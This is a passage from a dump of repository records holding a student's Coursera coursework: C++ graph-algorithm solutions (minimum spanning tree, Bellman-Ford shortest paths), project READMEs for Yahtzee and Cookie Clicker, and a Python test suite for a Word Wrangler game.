lenght of the optimal way to connect given points\r\n\tdouble result = 0.;\r\n\tint v;\r\n\tint i = 0;\r\n\tvector<bool> visited(x.size(), false);\r\n\t\r\n\tmin_queue.push(std::make_pair(0, 0));\r\n\r\n\twhile (i < x.size()) {\r\n\t\t\r\n\t\t//get current index for the x and y coordinate of the point/vertice\r\n\t\tv = min_queue.top().first;\r\n\t\t//mark the index and inturn the point as visited\r\n\t\tvisited[v] = true;\r\n\t\t//add the cost of the current point to the result \r\n\t\tresult += cost[v];\r\n\t\tmin_queue.pop();\r\n\t\t\r\n\t\t/****\r\n\t\t//the whole for loop stores all the distance values from the current point to other ones in the min_queue (i.e \r\n\t\t//it stores the points in increasing order of their distance from the current point)\r\n\t\t****/\r\n\t\tfor (int z = 0; z < x.size(); ++z)\r\n\t\t{\r\n\t\t\t//if point at index z is not visited\r\n\t\t\tif (visited[z] == false) {\r\n\t\t\t\t//find the distance from current point at index v to point at index z and store is as the edge weight\r\n\t\t\t\tweight = sqrt(pow((x[v] - x[z]), 2) + pow((y[v] - y[z]), 2));\r\n\t\t\t\t//if the cost of reaching the next vertice from current one is greater than the edge weight,\r\n\t\t\t\tif (cost[z] > weight) {\r\n\t\t\t\t\t//update cost of the next vertice \r\n\t\t\t\t\tcost[z] = weight;\r\n\t\t\t\t\t//push it on the queue\r\n\t\t\t\t\tmin_queue.push(std::make_pair(z, cost[z]));\r\n\t\t\t\t}\r\n\r\n\t\t\t}\r\n\t\t\t//this is used to remove the duplicates pushed onto the queue i.e. prevent storing the points and their costs that have\r\n\t\t\t//already been visited \r\n\t\t\telse if (min_queue.size() != 0) {\r\n\t\t\t\twhile (!min_queue.empty() && visited[min_queue.top().first] == true ) {\r\n\t\t\t\t\tmin_queue.pop();\r\n\t\t\t\t}\r\n\r\n\t\t\t}\r\n\r\n\t\t\t\r\n\t\t}\t\r\n\t\t++i;\r\n\t}\r\n\t\r\n\treturn result;\r\n}\r\n\r\nint main() {\r\n\t\r\n\tsize_t n;\r\n\tstd::cin >> n;\r\n\tvector<int> x(n), y(n);\r\n\tfor (size_t i = 0; i < n; i++) {\r\n\t\tstd::cin >> x[i] >> y[i];\r\n\t}\r\n\tstd::cout << std::setprecision(10) << minimum_distance(x, y) << std::endl;\r\n\r\n\t\r\n\t\r\n\t// A test case to check if the minimum_distance function works. These are commented since the \r\n\t// assignment requires the connecting_points.cpp file to read input values and output the respective\r\n\t// results on the console\r\n\t/************************************************************************************************************\r\n\tvector<int> x1(4), y1(4);\r\n\tx1[0] = 0;\r\n\ty1[0] = 0;\r\n\r\n\tx1[1] = 0;\r\n\ty1[1] = 1;\r\n\r\n\tx1[2] = 1;\r\n\ty1[2] = 0;\r\n\r\n\tx1[3] = 1;\r\n\ty1[3] = 1;\r\n\r\n\tstd::cout << std::setprecision(10) << minimum_distance(x1, y1) << std::endl;\r\n\r\n\tvector<int> x2(5), y2(5);\r\n\tx2[0] = 0;\r\n\ty2[0] = 0;\r\n\r\n\tx2[1] = 0;\r\n\ty2[1] = 2;\r\n\r\n\tx2[2] = 1;\r\n\ty2[2] = 1;\r\n\r\n\tx2[3] = 3;\r\n\ty2[3] = 0;\r\n\r\n\tx2[4] = 3;\r\n\ty2[4] = 2;\r\n\r\n\tstd::cout << std::setprecision(10) << minimum_distance(x2, y2) << std::endl;\r\n\r\n\t********************************************************************************************************/\r\n}\r\n"
},
{
"alpha_fraction": 0.7632075548171997,
"alphanum_fraction": 0.7745283246040344,
"avg_line_length": 104.9000015258789,
"blob_id": "2d638e868bd3e4a83c8541ab8a4d0f80ab6036ff",
"content_id": "4b973fe20364b97574163bed0be39f890787b135",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2120,
"license_type": "no_license",
"max_line_length": 635,
"num_lines": 20,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 1)/Mini-Project4 Game Yahtzee/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Mini-project #4 - Yahtzee\n\nImplemented the game strategy logic for a simplified version of the game Yahtzee in CodeSkulptor, a browser-based Python interpreter, as part of the coursework. \n\nLink to my solution:\n<http://www.codeskulptor.org/#user46_a5e527xGfZ_58.py>\n\nLink to the test suite for my solution: \n<http://www.codeskulptor.org/#user46_i4ScIuelhi_93.py>\n\nMini-project overview taken from course page can be found below:\n* [Yahtzee](https://en.wikipedia.org/wiki/Yahtzee) is a dice game played with 5 dice where you try to score the most points by matching certain combinations. You can play the game [here](https://cardgames.io/yahtzee/). In Yahtzee, you get to roll the dice three times on each turn. After the first roll, you may hold as many dice as you would like and roll the remaining free dice. After this second roll, you may again hold as many dice as you would like and roll the rest. Once you stop (either because you have exhausted your three rolls or you are satisfied with the dice you have), you score the dice in one box on the score card.\n\n* For this mini-project, we will implement a strategy function designed to help you choose which dice to hold after your second roll during the first turn of a game of Yahtzee. This function will consider all possible choices of dice to hold and recommend the choice that maximizes the expected value of your score after the final roll.\n\n* To simplify the mini-project, we will only consider scores corresponding to the \"upper\" section of the scorecard. Boxes in the upper section correspond to numbers on the dice. After each turn, you may choose one empty box and enter the sum of the dice you have with the corresponding number. For example, if you rolled **(2, 3, 3, 3, 4)**, you could score **2** in the Twos box, **9** in the Threes box, or **4** in the Fours box. (Restricting scoring to the upper section will also allow you to debug/test your strategy function on smaller numbers of dice.)\n\n\nComplete project description can be found at : \n<https://www.coursera.org/learn/principles-of-computing-1/supplement/MWNxX/mini-project-description>\n\n\n"
},
{
"alpha_fraction": 0.5138125419616699,
"alphanum_fraction": 0.5486472845077515,
"avg_line_length": 39.83964920043945,
"blob_id": "8a9ccd7d7481e39f088442b5648fa28a210c16ff",
"content_id": "70802364497498b5ff88e95c10343b5c980ac6aa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14009,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 343,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 2)/Mini-Project2 Word Wrangler/word_wrangler_testsuite.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nTesting suite for functions used in one implementation\nof word wrangler game\n\"\"\"\n\nimport poc_simpletest as simpletest\nimport user46_5gpKzUvHYk_75 as wrangler\n\nclass TestWordWangler():\n \"\"\"\n function that tests the remove_duplicate function\n of the word wrangler game mini-project\n \"\"\"\n def test_remove_duplicates(self):\n # create a TestSuite object\n suite = simpletest.TestSuite() \n\n print \"running remove_duplicate function test...\"\n\n # Test #1.1: list is empty. Should return an empty list\n in_lst = []\n out_lst_actual = wrangler.remove_duplicates(in_lst)\n out_lst_exp = []\n # run the Test #1.1 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #1.1: remove_duplicates\")\n # Test #1.2: list has one element. Should return same list\n in_lst = [1]\n out_lst_actual = wrangler.remove_duplicates(in_lst)\n out_lst_exp = [1]\n # run the Test #1.2 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #1.2: remove_duplicates\")\n # Test #1.3: list has all same elements. Should return list\n # of length 1\n in_lst = [2, 2, 2]\n out_lst_actual = wrangler.remove_duplicates(in_lst)\n out_lst_exp = [2]\n # run the Test #1.3 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #1.3: remove_duplicates\")\n # Test #1.4: list has all same elements at the end of the\n # list\n in_lst = [1, 2, 3, 3, 3]\n out_lst_actual = wrangler.remove_duplicates(in_lst)\n out_lst_exp = [1, 2, 3]\n # run the Test #1.4 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #1.4: remove_duplicates\")\n \n # Test #1.5: list has some duplicates at the beginning \n # of the list\n in_lst = [0, 0, 1, 3, 3, 7]\n out_lst_actual = wrangler.remove_duplicates(in_lst)\n out_lst_exp = [0, 1, 3, 7]\n # run the Test #1.5 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #1.5: remove_duplicates\")\n \n # Test #1.6: list has mulitple duplicates\n in_lst = [0, 0, 1, 3, 3, 7, 8, 8, 15, 15, 15, 15, 21]\n out_lst_actual = wrangler.remove_duplicates(in_lst)\n out_lst_exp = [0, 1, 3, 7, 8, 15, 21]\n # run the Test #1.6 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #1.6: remove_duplicates\")\n\n\n # report number of tests and failures\n suite.report_results()\n print \n \n \"\"\"\n function that tests the interesct function\n of the word wrangler game mini-project\n \"\"\"\n def test_intersect(self):\n # create a TestSuite object\n suite = simpletest.TestSuite() \n\n print \"running intersect function test...\"\n\n # Test #2.1: input lists are empty. 
Should return \n # an empty list\n in_lst1 = []\n in_lst2 = []\n out_lst_actual = wrangler.intersect(in_lst1, in_lst2)\n out_lst_exp = []\n # run the Test #2.1 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #2.1: intersect\")\n \n # Test #2.2: both input list have one elements with no\n # common value\n # an empty list\n in_lst1 = [1]\n in_lst2 = [2]\n out_lst_actual = wrangler.intersect(in_lst1, in_lst2)\n out_lst_exp = []\n # run the Test #2.2 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #2.2: intersect\")\n \n # Test #2.3: both input list have one elements with of same value\n # an empty list\n in_lst1 = [1]\n in_lst2 = [1]\n out_lst_actual = wrangler.intersect(in_lst1, in_lst2)\n out_lst_exp = [1]\n # run the Test #2.3 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #2.3: intersect\")\n \n \n # Test #2.4: both input list have multiple elements\n # with one common value\n in_lst1 = [1, 2, 10, 15]\n in_lst2 = [4, 7, 10]\n out_lst_actual = wrangler.intersect(in_lst1, in_lst2)\n out_lst_exp = [10]\n # run the Test #2.4 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #2.4: intersect\")\n \n # Test #2.5: one input list is a subset of the other list\n in_lst1 = [1, 2, 10, 15, 30]\n in_lst2 = [2, 10, 15]\n out_lst_actual = wrangler.intersect(in_lst1, in_lst2)\n out_lst_exp = [2, 10, 15]\n # run the Test #2.5 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #2.5: intersect\")\n \n # Test #2.6: some random input list combination\n in_lst1 = [1, 2, 10, 15, 30, 33, 40, 100, 200, 300]\n in_lst2 = [2, 10, 15, 17, 19, 300]\n out_lst_actual = wrangler.intersect(in_lst1, in_lst2)\n out_lst_exp = [2, 10, 15, 300]\n # run the Test #2.6 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #2.6: intersect\")\n\n\n # report number of tests and failures\n suite.report_results()\n print \n \n \n \"\"\"\n function that tests the merge function\n of the word wrangler game mini-project\n \"\"\"\n def test_merge(self):\n # create a TestSuite object\n suite = simpletest.TestSuite() \n\n print \"running merge function test...\"\n\n # Test #3.1: both input lists are empty. 
Should return \n # an empty list\n in_lst1 = []\n in_lst2 = []\n out_lst_actual = wrangler.merge(in_lst1, in_lst2)\n out_lst_exp = []\n # run the Test #3.1 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #3.1: merge\")\n # Test #3.2: first list is empty and while second has\n # one element\n in_lst1 = []\n in_lst2 = [1]\n out_lst_actual = wrangler.merge(in_lst1, in_lst2)\n out_lst_exp = [1]\n # run the Test #3.2 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #3.2: merge\")\n # Test #3.3: first list has one element while second\n # is empty\n # of length 1\n in_lst1 = [2]\n in_lst2 = []\n out_lst_actual = wrangler.merge(in_lst1, in_lst2)\n out_lst_exp = [2]\n # run the Test #3.3 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #3.3: merge\")\n # Test #3.4: both lists are equal i.e have same\n # elements\n in_lst1 = [1, 2, 3]\n in_lst2 = [1, 2, 3]\n out_lst_actual = wrangler.merge(in_lst1, in_lst2)\n out_lst_exp = [1, 1, 2, 2, 3, 3]\n # run the Test #3.4 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #3.4: merge\")\n \n # Test #3.5: first list has more elements than second list\n # with some duplicates\n in_lst1 = [0, 0, 1, 3]\n in_lst2 = [0, 5, 10]\n out_lst_actual = wrangler.merge(in_lst1, in_lst2)\n out_lst_exp = [0, 0, 0, 1, 3, 5, 10]\n # run the Test #3.5 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #3.5: merge\")\n \n # Test #3.6: first list has less elements than second list\n in_lst1 = [5, 10]\n in_lst2 = [2, 5, 11, 40, 41, 50]\n out_lst_actual = wrangler.merge(in_lst1, in_lst2)\n out_lst_exp = [2, 5, 5, 10, 11, 40, 41, 50]\n # run the Test #3.6 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #3.6: merge\")\n \n # Test #3.7: some random combination\n in_lst1 = [11, 12, 15, 15, 15]\n in_lst2 = [2, 15, 15, 30]\n out_lst_actual = wrangler.merge(in_lst1, in_lst2)\n out_lst_exp = [2, 11, 12, 15, 15, 15, 15, 15, 30]\n # run the Test #3.7 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #3.7: merge\")\n\n\n # report number of tests and failures\n suite.report_results()\n print \n \n \"\"\"\n function that tests the merge_sort function\n of the word wrangler game mini-project\n \"\"\"\n def test_merge_sort(self):\n # create a TestSuite object\n suite = simpletest.TestSuite() \n\n print \"running merge_sort function test...\"\n\n # Test #4.1: input list is empty. Should return an empty list\n in_lst = []\n out_lst_actual = wrangler.merge_sort(in_lst)\n out_lst_exp = []\n # run the Test #4.1 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #4.1: merge_sort\")\n # Test #4.2: input list has one element. Should return same list\n in_lst = [1]\n out_lst_actual = wrangler.merge_sort(in_lst)\n out_lst_exp = [1]\n # run the Test #4.2 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #4.2: merge_sort\")\n # Test #4.3: input list has all same elements. 
Should return the\n # list in same order as input list\n in_lst = [1, 1, 1]\n out_lst_actual = wrangler.merge_sort(in_lst)\n out_lst_exp = [1, 1, 1]\n # run the Test #4.3 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #4.3: merge_sort\")\n # Test #4.4: input list is in descending order. Should\n # return list in ascending order\n in_lst = [11, 5, 3, 2, 2]\n out_lst_actual = wrangler.merge_sort(in_lst)\n out_lst_exp = [2, 2, 3, 5, 11]\n # run the Test #4.4 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #4.4: merge_sort\")\n \n # Test #4.5: input list is randomly unordered. Should\n # return a list in ascending order\n in_lst = [1, 11, 2, 6, 3, 0, -1, 100]\n out_lst_actual = wrangler.merge_sort(in_lst)\n out_lst_exp = [-1, 0, 1, 2, 3, 6, 11, 100]\n # run the Test #4.5 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #4.5: merge_sort\")\n\n # report number of tests and failures\n suite.report_results()\n print \n \n \"\"\"\n helper function to check if all elements of the\n list are same\n \"\"\"\n \n \"\"\"\n function that tests gen_all_strings function\n of the word wrangler game mini-project\n \"\"\"\n def test_gen_all_strings(self):\n # create a TestSuite object\n suite = simpletest.TestSuite() \n\n print \"running gen_all_strings function test...\"\n\n # Test #5.1: input string is empty. Should return empty string\n in_string = \"\"\n out_str_lst_actual = wrangler.gen_all_strings(in_string)\n out_str_lst_exp = [\"\"]\n # run the Test #5.1 and compare the expected vs actual output\n suite.run_test(str(out_str_lst_actual), str(out_str_lst_exp), \n \"Test #5.1: gen_all_strings\")\n # Test #5.2: input string has one element. \n in_string = \"a\"\n out_str_lst_actual = wrangler.gen_all_strings(in_string)\n out_str_lst_exp = [\"\", \"a\"]\n # run the Test #5.2 and compare the expected vs actual output\n suite.run_test(str(out_str_lst_actual), str(out_str_lst_exp), \n \"Test #5.2: gen_all_strings\") \n # Test #5.3: input string has distinct characters. \n in_string = \"abc\"\n out_str_lst_actual = wrangler.gen_all_strings(in_string)\n out_str_lst_exp = ['', 'c', 'b', 'bc', 'cb', 'a', 'ac', 'ca', \n 'ab', 'ba', 'abc', 'bac', 'bca', 'acb', \n 'cab', 'cba']\n # run the Test #5.3 and compare the expected vs actual output\n suite.run_test(str(out_str_lst_actual), str(out_str_lst_exp), \n \"Test #5.3: gen_all_strings\")\n # Test #5.4: input string has duplicate characters. \n in_string = \"aab\"\n out_str_lst_actual = wrangler.gen_all_strings(in_string)\n out_str_lst_exp = ['', 'b', 'a', 'ab', 'ba', 'a', 'ab', 'ba',\n 'aa', 'aa', 'aab', 'aab', 'aba', 'aba', \n 'baa', 'baa']\n # run the Test #5.4 and compare the expected vs actual output\n suite.run_test(str(out_str_lst_actual), str(out_str_lst_exp), \n \"Test #5.4: gen_all_strings\") \n \n # report number of tests and failures\n suite.report_results()\n print \n \n \n# test all functions of the word wangler pini-project\nword_wangler = TestWordWangler()\nword_wangler.test_remove_duplicates()\nword_wangler.test_intersect()\nword_wangler.test_merge()\nword_wangler.test_merge_sort()\nword_wangler.test_gen_all_strings()\n\n"
},
{
"alpha_fraction": 0.79200279712677,
"alphanum_fraction": 0.7972640991210938,
"avg_line_length": 157.38888549804688,
"blob_id": "4ca8bd6d91090fb56d7ca068dc5c80c9355aaa59",
"content_id": "add25e69c33e380f0bc8ec6e4d0593f7efca3c3b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2851,
"license_type": "no_license",
"max_line_length": 722,
"num_lines": 18,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 1)/Mini-Project5 Cookie Clicker/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Mini-project #5 - Cookie Clicker\n\nImplemented a simplified simulation and various strategy functions for Cookie Clicker game in CodeSkulptor, a browser-based Python interpreter, as part of the coursework. \n\nLink to my solution:\n<http://www.codeskulptor.org/#user46_AZ0kaH7baf_105.py>\n\nMini-project overview taken from course page can be found below:\n* Cookie Clicker is a game built around a simulation in which your goal is to bake as many cookies as fast as possible. The main strategy component of the game is choosing how to allocate the cookies that you have produced to upgrade your ability to produce even more cookies faster. You can play Cookie Clicker [here](http://orteil.dashnet.org/cookieclicker/). Before you start work on this mini-project, we strongly recommend that you complete the Practice Activity, [\"The Case of the Greedy Boss\"](https://www.coursera.org/learn/principles-of-computing-1/supplement/b8bvB/practice-activity-the-case-of-the-greedy-boss), which is designed to walk you through the steps of building a simulation similar to Cookie Clicker.\n\n* In Cookie Clicker, you have many options for upgrading your ability to produce cookies. Originally, you can only produce cookies by clicking your mouse. However, you can use the cookies you earn to buy other methods of producing cookies (Grandmas, farms, factories, etc.). Each production method increases the number of \"cookies per second\" (CPS) you produce. Further, each time you buy one of the production methods, its price goes up. So, you must carefully consider the cost and benefits of purchasing a production method, and the trade-offs change as the game goes on.\n\n* For this assignment, you will implement a simplified simulation of the Cookie Clicker game. You will implement different strategies and see how they fare over a given period of time. In our version of the game, there is no graphical interface and therefore no actual \"clicking\". Instead, you will start with a CPS of 1.0 and may start purchasing automatic production methods once you have enough cookies to do so. You will implement both the simulation engine for the game and your own strategies for selecting what production methods to buy.\n\n* We have provided the following [template](http://www.codeskulptor.org/#poc_clicker_template.py) that contains an outline of the code you will write, including a **ClickerState** class, which will keep track of the state of the simulation, and a **simulate_clicker** function, which will run the simulation. The signature (name and parameters) of the functions, classes, and methods in this file must remain unchanged, but you may add any additional functions, methods, or other code that you need to.\n\nComplete project description can be found at : \n<https://www.coursera.org/learn/principles-of-computing-1/supplement/b3ZG8/mini-project-description>\n"
},
{
"alpha_fraction": 0.5621954202651978,
"alphanum_fraction": 0.5880995392799377,
"avg_line_length": 29.44354820251465,
"blob_id": "a4cb25dba1130e29a359e8a75b477446f997e8e0",
"content_id": "210a2f1672d0f0d1f7fe57ae88d4507ff5d04cf9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 7826,
"license_type": "no_license",
"max_line_length": 159,
"num_lines": 248,
"path": "/Algorithms on Graphs/Assignment4/shortest_path.cpp",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "// file: shortest_path.cpp\r\n// author: Shamsuddin Rehmani\r\n// date: 2016-07-17\r\n// description: Problem 3 of the fourth assignment of Algorithms on Graphs\r\n//\t\t\t\tby University of California, San Diego & Higher School of Economics on Coursera\r\n//\r\n// The task was: Given an directed graph with possibly negative edge weights and with \r\n//\t\t\t\tn vertices and m edges as well as its vertex s, compute the length of shortest paths\r\n//\t\t\t\tfrom s to all other vertices of the graph.\r\n//\r\n//\t\t\t\tInput Format. A graph is given in the standard format i.e on the first line input the number of nodes n\r\n//\t\t\t\tedges m for the graph (put a space between the two). The next lines contains two vertices u and v and \r\n//\t\t\t\tthe value of the edge weight from u to v. The last line contains the vertice for which you want to find\r\n//\t\t\t\tthe shortest path\r\n//\r\n//\t\t\t\tOutput: For all vertices i from 1 to n output the following on a separate line:\r\n//\t\t\t\t\t\t\t• “*”, if there is no path from s to u;\r\n//\t\t\t\t\t\t\t• “ - ”, if there is a path from s to u, but there is no shortest path from s to u(that is, the distance\r\n//\t\t\t\t\t\t\t\tfrom s to u is −∞);\r\n//\t\t\t\t\t\t\t• the length of a shortest path otherwise\r\n// \r\n//\t\t\t\tStarter file with main function was already provided but implementation of\r\n//\t\t\t\tshortest_path function had to be completed\r\n//\t\t\t\t\r\n//\t\t\t\tThe file passed all test cases on Coursera with\r\n//\t\t\t\tmax time used: 0.12/2.00 sec, max memory used: 11.6/512 MB. \r\n\r\n#include <iostream>\r\n#include <limits>\r\n#include <vector>\r\n#include <queue>\r\n\r\nusing std::vector;\r\nusing std::queue;\r\nusing std::pair;\r\nusing std::priority_queue;\r\n\r\n// Finds the shortest path from a given vertice to every other vertice in the graph\r\n// \r\n// PRE: 1 ≤ n ≤ 10e3; 0 ≤ m ≤ 10e4; edge weights are integers of absolute value at most 10e9\r\n//\t\t(note that m = edges of directed graph adj and n = size of adj)\r\n// POST: updates the distance, reachable and shortest vectors that will be used in the main function\r\n//\t\t to output shortest path if any\r\n//\t\t\r\n// PARAM: adj = directed graph represented in adjacancey list with n vertices and m edges where n is adj.size() \r\n//\t\t cost = adjacency list storing edge weights of all the edges leaving each vertice\r\n//\t\t s = vertice of a graph from which we want to find the shortest path to every other vertice of the graph\r\n//\t\t distance = stores the minimum distance from s to all other vertices\r\n//\t\t reachable = keeps track of the reachablity of all vertices from s.\r\n//\t\t shortest = keeps track of the existiblity of shortest path for each vertice from s. 
If the shortes path \r\n//\t\t\t\t\t is negative infinity then, then shortes path does not exist.\r\n\r\nvoid shortest_paths(vector<vector<int> > &adj, vector<vector<int> > &cost, int s, vector<long long> &distance, vector<int> &reachable, vector<int> &shortest) {\r\n\r\n\tint i = 0;\r\n\tqueue<int> myQueue;\r\n\tdistance[s] = 0;\r\n\t\r\n\tmyQueue.push(s);\r\n\tint w;\r\n\r\n\t// run a breath first search start from s and mark all the reachable vertices from s\r\n\twhile (!myQueue.empty())\r\n\t{\r\n\t\tw = myQueue.front();\r\n\t\t//stores true for all reachable vertices\r\n\t\treachable[w] = 1;\r\n\t\tmyQueue.pop();\r\n\t\tfor (vector<int>::size_type v = 0; v < adj[w].size(); v++) {\r\n\t\t\tif (reachable[adj[w][v]]== 0) {\r\n\r\n\t\t\t\tmyQueue.push(adj[w][v]);\r\n\t\t\t\t//stores true for all reachable vertices\r\n\t\t\t\treachable[adj[w][v]] = 1;\r\n\t\t\t}\r\n\r\n\t\t}\r\n\t}\r\n\r\n\r\n\t// run Bellman-Ford algorthm n times, and store all the vertice whose distance was updated at the nth iteration in a queue\r\n\twhile (i < adj.size()) {\r\n\r\n\t\tfor (vector<int>::size_type u = 0; u < adj.size(); u++) {\r\n\r\n\t\t\t//if the distance value is infinity i.e. the vertice has not yet been visited\r\n\t\t\tif (distance[u] < std::numeric_limits<long long>::max()) {\r\n\r\n\t\t\t\tfor (vector<int>::size_type v = 0; v < adj[u].size(); v++) {\r\n\r\n\t\t\t\t\tif (distance[adj[u][v]] == std::numeric_limits<long long>::max() || distance[adj[u][v]] > distance[u] + cost[u][v]) {\r\n\r\n\t\t\t\t\t\tdistance[adj[u][v]] = distance[u] + cost[u][v];\r\n\r\n\t\t\t\t\t\t//at the nth interation, store all vertices in a queue since these are part of the negative cycle\r\n\t\t\t\t\t\tif (i == adj.size() - 1) {\r\n\t\t\t\t\t\t\tmyQueue.push(adj[u][v]);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\r\n\r\n\r\n\t\t\t\t\t}\r\n\r\n\t\t\t\t}\r\n\t\t\t}\r\n\r\n\t\t}\r\n\r\n\t\t++i;\r\n\t}\r\n\r\n\t// for all vertices whose distance was updated on the nth iteration of the Bellman-Ford, mark those and all \r\n\t// the reachable vertice from these as not having any shortest path\r\n\twhile (!myQueue.empty())\r\n\t{\r\n\t\tw = myQueue.front();\r\n\t\tshortest[w] = 0;\r\n\t\tmyQueue.pop();\r\n\t\tfor (vector<int>::size_type v = 0; v < adj[w].size(); v++) {\r\n\t\t\tif (shortest[adj[w][v]] == 1) {\r\n\t\t\t\tmyQueue.push(adj[w][v]);\r\n\t\t\t\tshortest[adj[w][v]] = 0;\r\n\t\t\t}\r\n\r\n\t\t}\r\n\t}\r\n\r\n\r\n\r\n}\r\n\r\nint main() {\r\n\t\r\n\tint n, m, s;\r\n\tstd::cin >> n >> m;\r\n\tvector<vector<int> > adj(n, vector<int>());\r\n\tvector<vector<int> > cost(n, vector<int>());\r\n\tfor (int i = 0; i < m; i++) {\r\n\t\tint x, y, w;\r\n\t\tstd::cin >> x >> y >> w;\r\n\t\tadj[x - 1].push_back(y - 1);\r\n\t\tcost[x - 1].push_back(w);\r\n\t}\r\n\tstd::cin >> s;\r\n\ts--;\r\n\tvector<long long> distance(n, std::numeric_limits<long long>::max());\r\n\tvector<int> reachable(n, 0);\r\n\tvector<int> shortest(n, 1); // 1 represents shortest path exists, 0 otherwise\r\n\tshortest_paths(adj, cost, s, distance, reachable, shortest);\r\n\tfor (int i = 0; i < n; i++) {\r\n\t\tif (!reachable[i]) {\r\n\t\t\tstd::cout << \"*\\n\";\r\n\t\t}\r\n\t\telse if (!shortest[i]) {\r\n\t\t\tstd::cout << \"-\\n\";\r\n\t\t}\r\n\t\telse {\r\n\t\t\tstd::cout << distance[i] << \"\\n\";\r\n\t\t}\r\n\t}\r\n\t\r\n\t// A test case to check if the shortest_path function works. 
These are commented since the \r\n\t// assignment requires the shortest_path.cpp file to read input values and output the respective\r\n\t// results on the console\r\n\t/**************************************************************************************\r\n\t\r\n\tint n = 6;\r\n\tint s = 1 - 1;\r\n\tvector<vector<int> > adj1(n, vector<int>());\r\n\tvector<vector<int> > cost1(n, vector<int>());\r\n\tvector<long long> distance1(n, std::numeric_limits<long long>::max());\r\n\tvector<int> reachable1(n, 0);\r\n\tvector<int> shortest1(n, 1); // 1 represents shortest path exists, 0 otherwise\r\n\t\r\n\tadj1[1 - 1].push_back(2 - 1);\r\n\tcost1[1 - 1].push_back(10);\r\n\r\n\tadj1[2 - 1].push_back(3 - 1);\r\n\tcost1[2 - 1].push_back(5);\r\n\r\n\tadj1[1 - 1].push_back(3 - 1);\r\n\tcost1[1 - 1].push_back(100);\r\n\r\n\tadj1[3 - 1].push_back(5 - 1);\r\n\tcost1[3 - 1].push_back(7);\r\n\r\n\tadj1[5 - 1].push_back(4 - 1);\r\n\tcost1[5 - 1].push_back(10);\r\n\r\n\tadj1[4 - 1].push_back(3 - 1);\r\n\tcost1[4 - 1].push_back(-18);\r\n\t\r\n\tadj1[6 - 1].push_back(1 - 1);\r\n\tcost1[6 - 1].push_back(-1);\r\n\r\n\tshortest_paths(adj1, cost1, s, distance1, reachable1, shortest1);\r\n\tfor (int i = 0; i < n; i++) {\r\n\t\tif (!reachable1[i]) {\r\n\t\t\tstd::cout << \"*\\n\";\r\n\t\t}\r\n\t\telse if (!shortest1[i]) {\r\n\t\t\tstd::cout << \"-\\n\";\r\n\t\t}\r\n\t\telse {\r\n\t\t\tstd::cout << distance1[i] << \"\\n\";\r\n\t\t}\r\n\t}\r\n\r\n\t//test2\r\n\r\n\tn = 5;\r\n\ts = 4 - 1;\r\n\tvector<vector<int> > adj2(n, vector<int>());\r\n\tvector<vector<int> > cost2(n, vector<int>());\r\n\tvector<long long> distance2(n, std::numeric_limits<long long>::max());\r\n\tvector<int> reachable2(n, 0);\r\n\tvector<int> shortest2(n, 1); // 1 represents shortest path exists, 0 otherwise\r\n\r\n\tadj2[1 - 1].push_back(2 - 1);\r\n\tcost2[1 - 1].push_back(1);\r\n\r\n\tadj2[4 - 1].push_back(1 - 1);\r\n\tcost2[4 - 1].push_back(2);\r\n\r\n\tadj2[2 - 1].push_back(3 - 1);\r\n\tcost2[2 - 1].push_back(2);\r\n\r\n\tadj2[3 - 1].push_back(1 - 1);\r\n\tcost2[3 - 1].push_back(-5);\r\n\r\n\tstd::cout << std::endl;\r\n\r\n\tshortest_paths(adj2, cost2, s, distance2, reachable2, shortest2);\r\n\tfor (int i = 0; i < n; i++) {\r\n\t\tif (!reachable2[i]) {\r\n\t\t\tstd::cout << 